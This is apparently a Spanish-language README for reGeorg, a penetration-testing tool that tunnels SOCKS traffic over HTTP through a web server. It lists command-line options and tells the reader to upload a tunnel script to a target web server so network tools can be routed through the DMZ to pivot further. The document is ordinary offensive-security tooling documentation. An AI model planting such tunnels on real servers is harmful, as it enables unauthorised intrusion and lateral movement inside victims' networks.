
El sucesor de reDuh, compromete un servidor web bastión y crea proxies SOCKS a través de la DMZ. Pivota y pwn.
_____ ______ __|___ |__ ______ _____ _____ ______
| | | ___|| ___| || ___|/ \| | | ___|
| \ | ___|| | | || ___|| || \ | | |
|__|\__\|______||______| __||______|\_____/|__|\__\|______|
|_____|
... every office needs a tool like Georg
[email protected] / @kamp_staaldraad
1.0
reGeorg requiere Python 2.7 y los siguientes módulos:
$ reGeorgSocksProxy.py [-h] [-l] [-p] [-r] -u [-v]
Servidor Socks para túnel HTTP(s) reGeorg
argumentos opcionales:
-h, --help muestra este mensaje de ayuda y sale
-l , --listen-on Dirección de escucha predeterminada
-p , --listen-port Puerto de escucha predeterminado
-r , --read-buff Búfer de lectura local, datos máximos a enviar por POST
-u , --url URL que contiene el script de túnel
-v , --verbose Salida detallada [INFO|DEBUG]
Paso 1. Suba tunnel.(aspx|ashx|jsp|php) a un servidor web (Cómo hacerlo depende de usted)
Paso 2. Configure sus herramientas para usar un proxy socks, use la dirección IP y el puerto que especificó cuando inició reGeorgSocksProxy.py
** Nota, si sus herramientas, como NMap, no soportan proxies socks, use proxychains (ver wiki)
$ python reGeorgSocksProxy.py -p 8080 -u http://upload.sensepost.net:8080/tunnel/tunnel.jsp
MIT